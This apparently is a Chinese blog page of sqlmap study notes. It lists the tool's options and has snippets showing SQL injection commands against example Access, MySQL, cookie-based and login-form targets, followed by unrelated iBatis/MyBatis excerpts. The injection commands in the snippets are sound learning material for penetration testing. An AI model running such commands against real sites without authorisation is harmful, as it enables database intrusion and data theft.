sqlmap学习笔记

环境:centos7 , python2.7.5  , sqlmap1.1.8.2#dev

sqlmap文件目录

执行命名格式:python sqlmap.py --h

常用命令:(通过帮助信息可以,找到需要的命令)

--h (显示基本帮助信息)

--hh (显示高级帮助信息)

-u URL, –url=URL 目标URL

--cookie=COOKIE HTTP Cookie头

--data=DATA 通过POST发送的数据字符串

-D DB 指定进行枚举的数据库名

-T TBL 要指定操作的数据库表名称

--dbs 枚举数据库管理系统中的数据库名称

--batch 自动选yes

--smart 启发式快速判断

-r REQUESTFILE 从一个文件中载入HTTP请求

-l LIST 从Burp或WebScarab代理的日志中解析目标。

sqlmap官网:http://sqlmap.org/

时间: 2024-11-03 01:45:53

sqlmap学习笔记的相关文章

1.sqlmap学习笔记之Access注入

使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7" 假设返回内容如下: ------------------------- [INFO] resuming back-end DBMS 'microsoft access' ------------------------- 2.猜数据库表,输入: .sqlmap.py -u "http:/

4.羽翼sqlmap学习笔记之Post登录框注入

4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: ./sqlmap.py -r search-test.txt -p tfUPass 注入方式二:自动搜索表单的方式 sqlmap -u http://xxx.xxx.com/Login.asp --forms 注入方式三:指定一个参数的方法 sqlmap -u http://xxx.xxx.com/L

2.sqlmap学习笔记之MySQL注入

1.判断一个url是否存在注入点: .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 假设找到数据库:student ------------------------------ available databases[1] [*] student ------------------------------ 2.获取数据库中的表名: .sqlmap.py -u "http://abcd****efg.asp?id=7"

3.sqlmap学习笔记之Cookie注入

Cookie注入: 1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.2.sqlmap命令提示符下输入下列内容进行跑表. sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2 假设返回内容如下,说明是access数据库. ------------------------- [INFO] resuming ba

学习笔记 | sqlmap常用命令

请移步以下链接查看本文章 学习笔记 | sqlmap常用命令 http://www.lofter.com/lpost/1f350fa3_120429c7 原文地址:http://blog.51cto.com/1425831735/2059514

IBatis.Net学习笔记六--再谈查询

在IBatis.Net学习笔记五--常用的查询方式 中我提到了一些IBatis.Net中的查询,特别是配置文件的写法. 后来通过大家的讨论,特别是Anders Cui 的提醒,又发现了其他的多表查询的方式.在上一篇文章中我提到了三种方式,都是各有利弊:第一种方式当数据关联很多的情况下,实体类会很复杂:第二种方式比较灵活,但是不太符合OO的思想(不过,可以适当使用):第三种方式最主要的问题就是性能不太理想,配置比较麻烦. 下面是第四种多表查询的方式,相对第二种多了一点配置,但是其他方面都很好(当然

mybatis学习笔记(14)-spring和mybatis整合

mybatis学习笔记(14)-spring和mybatis整合 mybatis学习笔记14-spring和mybatis整合 整合思路 整合环境 sqlSessionFactory 原始dao开发和spring整合后 mapper代理开发 遇到的问题 本文主要将如何将spring和mybatis整合,只是作简单的示例,没有使用Maven构建.并展示mybatis与spring整合后如何进行原始dao开发和mapper代理开发. 整合思路 需要spring通过单例方式管理SqlSessionFa

ibatis学习笔记(完整)

1.       Ibatis是开源软件组织Apache推出的一种轻量级的对象关系映射(ORM)框架,和Hibernate.Toplink等在java编程的对象持久化方面深受开发人员欢迎. 对象关系映射(ORM):简单原理是通过面向对象方式操作关系型数据库,目前存储数据最常用最流行的工具是关系型数据库,其操作方式是通过SQL语句操作数据库的表,但是对于Java面向对象编程语言中,所有的操作对象都是对象,因此对象关系映射就是把数据库表和java编程语言中的对象对应起来,把表的列同java对象中的字

【web开发学习笔记】ibatis学习总结

ibatis学习总结 ibatis数据库配置文件 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE sqlMapConfig PUBLIC "-//ibatis.apache.org//DTD SQL Map Config 2.0//EN" "http://ibatis.apache.org/dtd/sql-map-config-2.dtd"> <